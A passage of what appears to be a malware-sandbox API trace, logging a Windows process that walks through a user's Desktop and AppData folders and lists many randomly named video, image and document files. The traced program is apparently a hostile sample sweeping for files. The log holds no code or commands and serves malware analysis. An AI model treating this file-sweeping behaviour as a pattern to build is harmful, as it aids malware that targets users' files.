ftCreationTime.dwLowDateTime=0xe3989090, ftCreationTime.dwHighDateTime=0x1d5bc5b, ftLastAccessTime.dwLowDateTime=0x2e8cd640, ftLastAccessTime.dwHighDateTime=0x1d5c0f5, ftLastWriteTime.dwLowDateTime=0x2e8cd640, ftLastWriteTime.dwHighDateTime=0x1d5c0f5, nFileSizeHigh=0x0, nFileSizeLow=0x9e1f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FV7B4Ysx7Ewbiz.mkv", cAlternateFileName="FV7B4Y~1.MKV")) returned 1 [0094.304] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b635f20, ftCreationTime.dwHighDateTime=0x1d5bc62, ftLastAccessTime.dwLowDateTime=0xc4ca0dc0, ftLastAccessTime.dwHighDateTime=0x1d5c286, ftLastWriteTime.dwLowDateTime=0xc4ca0dc0, ftLastWriteTime.dwHighDateTime=0x1d5c286, nFileSizeHigh=0x0, nFileSizeLow=0x14949, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gyahlrB1X9.avi", cAlternateFileName="GYAHLR~1.AVI")) returned 1 [0094.304] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x227ef2d0, ftCreationTime.dwHighDateTime=0x1d5c0e0, ftLastAccessTime.dwLowDateTime=0xbb9fc940, ftLastAccessTime.dwHighDateTime=0x1d5c224, ftLastWriteTime.dwLowDateTime=0xbb9fc940, ftLastWriteTime.dwHighDateTime=0x1d5c224, nFileSizeHigh=0x0, nFileSizeLow=0x143ad, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gZKZP.avi", cAlternateFileName="")) returned 1 [0094.304] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce196410, ftCreationTime.dwHighDateTime=0x1d5b67f, ftLastAccessTime.dwLowDateTime=0xfffdbf80, ftLastAccessTime.dwHighDateTime=0x1d5c1ec, ftLastWriteTime.dwLowDateTime=0xfffdbf80, ftLastWriteTime.dwHighDateTime=0x1d5c1ec, nFileSizeHigh=0x0, nFileSizeLow=0x10e03, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="j20KuR.mkv", cAlternateFileName="")) returned 1 [0094.304] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf46ef3b0, ftCreationTime.dwHighDateTime=0x1d5c001, ftLastAccessTime.dwLowDateTime=0x6f722ac0, ftLastAccessTime.dwHighDateTime=0x1d5c492, ftLastWriteTime.dwLowDateTime=0x6f722ac0, ftLastWriteTime.dwHighDateTime=0x1d5c492, nFileSizeHigh=0x0, nFileSizeLow=0x1681c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Jg7ye.flv", cAlternateFileName="")) returned 1 [0094.304] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4870b60, ftCreationTime.dwHighDateTime=0x1d5b644, ftLastAccessTime.dwLowDateTime=0x35935c30, ftLastAccessTime.dwHighDateTime=0x1d5c0ae, ftLastWriteTime.dwLowDateTime=0x35935c30, ftLastWriteTime.dwHighDateTime=0x1d5c0ae, nFileSizeHigh=0x0, nFileSizeLow=0x12f8e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jlOAiJaUlU7C6bw.mp4", cAlternateFileName="JLOAIJ~1.MP4")) returned 1 [0094.304] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6edaa750, ftCreationTime.dwHighDateTime=0x1d5c1c1, ftLastAccessTime.dwLowDateTime=0xcf7281f0, ftLastAccessTime.dwHighDateTime=0x1d5b5af, ftLastWriteTime.dwLowDateTime=0xcf7281f0, ftLastWriteTime.dwHighDateTime=0x1d5b5af, nFileSizeHigh=0x0, nFileSizeLow=0xdd83, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="k7XpB.mkv", cAlternateFileName="")) returned 1 [0094.304] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd9bcde0, ftCreationTime.dwHighDateTime=0x1d5bab1, ftLastAccessTime.dwLowDateTime=0x3bc55400, ftLastAccessTime.dwHighDateTime=0x1d5c12b, ftLastWriteTime.dwLowDateTime=0x3bc55400, ftLastWriteTime.dwHighDateTime=0x1d5c12b, nFileSizeHigh=0x0, nFileSizeLow=0x3983, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lBUQXS.mp4", cAlternateFileName="")) returned 1 [0094.304] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x283e8710, ftCreationTime.dwHighDateTime=0x1d5ba89, ftLastAccessTime.dwLowDateTime=0x5b4edb00, ftLastAccessTime.dwHighDateTime=0x1d5c0f6, ftLastWriteTime.dwLowDateTime=0x5b4edb00, ftLastWriteTime.dwHighDateTime=0x1d5c0f6, nFileSizeHigh=0x0, nFileSizeLow=0x48ef, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lNC_IynejbQe.avi", cAlternateFileName="LNC_IY~1.AVI")) returned 1 [0094.304] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe822a6b0, ftCreationTime.dwHighDateTime=0x1d5c268, ftLastAccessTime.dwLowDateTime=0x2396700, ftLastAccessTime.dwHighDateTime=0x1d5bcb0, ftLastWriteTime.dwLowDateTime=0x2396700, ftLastWriteTime.dwHighDateTime=0x1d5bcb0, nFileSizeHigh=0x0, nFileSizeLow=0x88a2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lxTxgdj8XUNpt.swf", cAlternateFileName="LXTXGD~1.SWF")) returned 1 [0094.304] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe38c25f0, ftCreationTime.dwHighDateTime=0x1d5ba15, ftLastAccessTime.dwLowDateTime=0xcdaf6d20, ftLastAccessTime.dwHighDateTime=0x1d5be1e, ftLastWriteTime.dwLowDateTime=0xcdaf6d20, ftLastWriteTime.dwHighDateTime=0x1d5be1e, nFileSizeHigh=0x0, nFileSizeLow=0x873f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="oVsvZ7ftfd4dfii6-W7M.flv", cAlternateFileName="OVSVZ7~1.FLV")) returned 1 [0094.304] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8bbc1e0, ftCreationTime.dwHighDateTime=0x1d5bbca, ftLastAccessTime.dwLowDateTime=0xd551f920, ftLastAccessTime.dwHighDateTime=0x1d5c473, ftLastWriteTime.dwLowDateTime=0xd551f920, ftLastWriteTime.dwHighDateTime=0x1d5c473, nFileSizeHigh=0x0, nFileSizeLow=0x132c6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pwBi 85Lt0LQRz0Na9iY.avi", cAlternateFileName="PWBI85~1.AVI")) returned 1 [0094.304] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34bb0de0, ftCreationTime.dwHighDateTime=0x1d5b748, ftLastAccessTime.dwLowDateTime=0x70c0e4b0, ftLastAccessTime.dwHighDateTime=0x1d5b656, ftLastWriteTime.dwLowDateTime=0x70c0e4b0, ftLastWriteTime.dwHighDateTime=0x1d5b656, nFileSizeHigh=0x0, nFileSizeLow=0x18523, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QwwxKA1eF4.mp4", cAlternateFileName="QWWXKA~1.MP4")) returned 1 [0094.304] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x374035c0, ftCreationTime.dwHighDateTime=0x1d5b6d2, ftLastAccessTime.dwLowDateTime=0x4da46560, ftLastAccessTime.dwHighDateTime=0x1d5b91c, ftLastWriteTime.dwLowDateTime=0x4da46560, ftLastWriteTime.dwHighDateTime=0x1d5b91c, nFileSizeHigh=0x0, nFileSizeLow=0xa2a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RT_vF1gOxTZ.avi", cAlternateFileName="RT_VF1~1.AVI")) returned 1 [0094.304] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc104dc80, ftCreationTime.dwHighDateTime=0x1d5bdb1, ftLastAccessTime.dwLowDateTime=0x2ddaea00, ftLastAccessTime.dwHighDateTime=0x1d5c0b6, ftLastWriteTime.dwLowDateTime=0x2ddaea00, ftLastWriteTime.dwHighDateTime=0x1d5c0b6, nFileSizeHigh=0x0, nFileSizeLow=0x93a3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="S7HFtHlscpsrLt.mp4", cAlternateFileName="S7HFTH~1.MP4")) returned 1 [0094.304] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78af17e0, ftCreationTime.dwHighDateTime=0x1d5bf99, ftLastAccessTime.dwLowDateTime=0xc3bc7d60, ftLastAccessTime.dwHighDateTime=0x1d5c11d, ftLastWriteTime.dwLowDateTime=0xc3bc7d60, ftLastWriteTime.dwHighDateTime=0x1d5c11d, nFileSizeHigh=0x0, nFileSizeLow=0x7936, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sqUbnXT-jNRb5-frgY.avi", cAlternateFileName="SQUBNX~1.AVI")) returned 1 [0094.304] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc98fd30, ftCreationTime.dwHighDateTime=0x1d5bf19, ftLastAccessTime.dwLowDateTime=0x2ea44c00, ftLastAccessTime.dwHighDateTime=0x1d5baf9, ftLastWriteTime.dwLowDateTime=0x2ea44c00, ftLastWriteTime.dwHighDateTime=0x1d5baf9, nFileSizeHigh=0x0, nFileSizeLow=0x11b2c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="T37HFV.flv", cAlternateFileName="")) returned 1 [0094.304] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x619e0b80, ftCreationTime.dwHighDateTime=0x1d5b9e3, ftLastAccessTime.dwLowDateTime=0x91446e70, ftLastAccessTime.dwHighDateTime=0x1d5bcf8, ftLastWriteTime.dwLowDateTime=0x91446e70, ftLastWriteTime.dwHighDateTime=0x1d5bcf8, nFileSizeHigh=0x0, nFileSizeLow=0x1075c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ui4peF.flv", cAlternateFileName="")) returned 1 [0094.304] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c46f3a0, ftCreationTime.dwHighDateTime=0x1d5c0c9, ftLastAccessTime.dwLowDateTime=0x8d0e8b50, ftLastAccessTime.dwHighDateTime=0x1d5c4ab, ftLastWriteTime.dwLowDateTime=0x8d0e8b50, ftLastWriteTime.dwHighDateTime=0x1d5c4ab, nFileSizeHigh=0x0, nFileSizeLow=0xebff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ViLsu.mp4", cAlternateFileName="")) returned 1 [0094.304] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20bddb40, ftCreationTime.dwHighDateTime=0x1d5b7b3, ftLastAccessTime.dwLowDateTime=0x170b1150, ftLastAccessTime.dwHighDateTime=0x1d5b80b, ftLastWriteTime.dwLowDateTime=0x170b1150, ftLastWriteTime.dwHighDateTime=0x1d5b80b, nFileSizeHigh=0x0, nFileSizeLow=0x8398, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vq g FTFubq5cA.flv", cAlternateFileName="VQGFTF~1.FLV")) returned 1 [0094.304] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3dd65c0, ftCreationTime.dwHighDateTime=0x1d5c5cc, ftLastAccessTime.dwLowDateTime=0xf79bc2c0, ftLastAccessTime.dwHighDateTime=0x1d5bc55, ftLastWriteTime.dwLowDateTime=0xf79bc2c0, ftLastWriteTime.dwHighDateTime=0x1d5bc55, nFileSizeHigh=0x0, nFileSizeLow=0x62c0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WwSL.flv", cAlternateFileName="")) returned 1 [0094.304] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41fe2af0, ftCreationTime.dwHighDateTime=0x1d5b676, ftLastAccessTime.dwLowDateTime=0x9f59c610, ftLastAccessTime.dwHighDateTime=0x1d5c5de, ftLastWriteTime.dwLowDateTime=0x9f59c610, ftLastWriteTime.dwHighDateTime=0x1d5c5de, nFileSizeHigh=0x0, nFileSizeLow=0xcaa6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XAmJunRYy2WXWqujiyt.mkv", cAlternateFileName="XAMJUN~1.MKV")) returned 1 [0094.304] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xceea8e80, ftCreationTime.dwHighDateTime=0x1d5b776, ftLastAccessTime.dwLowDateTime=0xbacfaae0, ftLastAccessTime.dwHighDateTime=0x1d5bea9, ftLastWriteTime.dwLowDateTime=0xbacfaae0, ftLastWriteTime.dwHighDateTime=0x1d5bea9, nFileSizeHigh=0x0, nFileSizeLow=0xe252, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XHearxWNtiYbMgqS bX.flv", cAlternateFileName="XHEARX~1.FLV")) returned 1 [0094.304] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b6cfae0, ftCreationTime.dwHighDateTime=0x1d5c3c2, ftLastAccessTime.dwLowDateTime=0x57cb17a0, ftLastAccessTime.dwHighDateTime=0x1d5c308, ftLastWriteTime.dwLowDateTime=0x57cb17a0, ftLastWriteTime.dwHighDateTime=0x1d5c308, nFileSizeHigh=0x0, nFileSizeLow=0xf897, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yty9V7vt-N2 T.avi", cAlternateFileName="YTY9V7~1.AVI")) returned 1 [0094.304] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17276450, ftCreationTime.dwHighDateTime=0x1d5c2be, ftLastAccessTime.dwLowDateTime=0xd6e17740, ftLastAccessTime.dwHighDateTime=0x1d5c309, ftLastWriteTime.dwLowDateTime=0xd6e17740, ftLastWriteTime.dwHighDateTime=0x1d5c309, nFileSizeHigh=0x0, nFileSizeLow=0x8654, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_qZtKPa8t1aDT4M.mp4", cAlternateFileName="_QZTKP~1.MP4")) returned 1 [0094.304] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17276450, ftCreationTime.dwHighDateTime=0x1d5c2be, ftLastAccessTime.dwLowDateTime=0xd6e17740, ftLastAccessTime.dwHighDateTime=0x1d5c309, ftLastWriteTime.dwLowDateTime=0xd6e17740, ftLastWriteTime.dwHighDateTime=0x1d5c309, nFileSizeHigh=0x0, nFileSizeLow=0x8654, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_qZtKPa8t1aDT4M.mp4", cAlternateFileName="_QZTKP~1.MP4")) returned 0 [0094.304] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0094.305] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.305] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.305] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0094.305] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0094.305] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0094.305] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0094.305] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.305] PathFindFileNameW (pszPath="") returned="" [0094.305] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0094.305] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.305] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0094.305] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0094.305] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 1 [0094.305] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 0 [0094.305] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0094.306] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.306] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.306] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KMPcG-yOQU21BwvLjWXX\\") returned="KMPcG-yOQU21BwvLjWXX\\" [0094.306] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0094.306] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0094.306] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0094.306] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.306] PathFindFileNameW (pszPath="") returned="" [0094.306] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KMPcG-yOQU21BwvLjWXX\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcd03d7d0, ftCreationTime.dwHighDateTime=0x1d5bd42, ftLastAccessTime.dwLowDateTime=0xb36cc4a0, ftLastAccessTime.dwHighDateTime=0x1d5b980, ftLastWriteTime.dwLowDateTime=0xb36cc4a0, ftLastWriteTime.dwHighDateTime=0x1d5b980, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0094.306] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcd03d7d0, ftCreationTime.dwHighDateTime=0x1d5bd42, ftLastAccessTime.dwLowDateTime=0xb36cc4a0, ftLastAccessTime.dwHighDateTime=0x1d5b980, ftLastWriteTime.dwLowDateTime=0xb36cc4a0, ftLastWriteTime.dwHighDateTime=0x1d5b980, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.306] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7148f1c0, ftCreationTime.dwHighDateTime=0x1d5ba7a, ftLastAccessTime.dwLowDateTime=0xd66b500, ftLastAccessTime.dwHighDateTime=0x1d5ba81, ftLastWriteTime.dwLowDateTime=0xd66b500, ftLastWriteTime.dwHighDateTime=0x1d5ba81, nFileSizeHigh=0x0, nFileSizeLow=0x15e76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2TaJ89Ee8.bmp", cAlternateFileName="2TAJ89~1.BMP")) returned 1 [0094.306] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e1d90e0, ftCreationTime.dwHighDateTime=0x1d5b87c, ftLastAccessTime.dwLowDateTime=0x83bf42a0, ftLastAccessTime.dwHighDateTime=0x1d5c399, ftLastWriteTime.dwLowDateTime=0x83bf42a0, ftLastWriteTime.dwHighDateTime=0x1d5c399, nFileSizeHigh=0x0, nFileSizeLow=0xe264, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="553Q_Gxbe.docx", cAlternateFileName="553Q_G~1.DOC")) returned 1 [0094.306] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47028800, ftCreationTime.dwHighDateTime=0x1d5c4c4, ftLastAccessTime.dwLowDateTime=0x5b47ba90, ftLastAccessTime.dwHighDateTime=0x1d5b7ec, ftLastWriteTime.dwLowDateTime=0x5b47ba90, ftLastWriteTime.dwHighDateTime=0x1d5b7ec, nFileSizeHigh=0x0, nFileSizeLow=0x340b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="77 l uyd5foD_16HEXj.gif", cAlternateFileName="77LUYD~1.GIF")) returned 1 [0094.306] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1592c4d0, ftCreationTime.dwHighDateTime=0x1d5bccf, ftLastAccessTime.dwLowDateTime=0xf14839e0, ftLastAccessTime.dwHighDateTime=0x1d5bfa1, ftLastWriteTime.dwLowDateTime=0xf14839e0, ftLastWriteTime.dwHighDateTime=0x1d5bfa1, nFileSizeHigh=0x0, nFileSizeLow=0x162b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DSlXC5Gr0YME5YlGSV.flv", cAlternateFileName="DSLXC5~1.FLV")) returned 1 [0094.306] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4fc9be0, ftCreationTime.dwHighDateTime=0x1d5baaa, ftLastAccessTime.dwLowDateTime=0xc5882570, ftLastAccessTime.dwHighDateTime=0x1d5c52a, ftLastWriteTime.dwLowDateTime=0xc5882570, ftLastWriteTime.dwHighDateTime=0x1d5c52a, nFileSizeHigh=0x0, nFileSizeLow=0xbe39, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pC 1IafdNC2Xu47Zyxxd.bmp", cAlternateFileName="PC1IAF~1.BMP")) returned 1 [0094.306] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e576380, ftCreationTime.dwHighDateTime=0x1d5bba0, ftLastAccessTime.dwLowDateTime=0x8ff70340, ftLastAccessTime.dwHighDateTime=0x1d5bafd, ftLastWriteTime.dwLowDateTime=0x8ff70340, ftLastWriteTime.dwHighDateTime=0x1d5bafd, nFileSizeHigh=0x0, nFileSizeLow=0xe07c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Z04lPziTG1LwOrtQt.png", cAlternateFileName="Z04LPZ~1.PNG")) returned 1 [0094.307] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xafa2960, ftCreationTime.dwHighDateTime=0x1d5bf85, ftLastAccessTime.dwLowDateTime=0x72f2bc10, ftLastAccessTime.dwHighDateTime=0x1d5c1cb, ftLastWriteTime.dwLowDateTime=0x72f2bc10, ftLastWriteTime.dwHighDateTime=0x1d5c1cb, nFileSizeHigh=0x0, nFileSizeLow=0x2b91, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZHTOAxESRSu4ZX.mp3", cAlternateFileName="ZHTOAX~1.MP3")) returned 1 [0094.307] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: 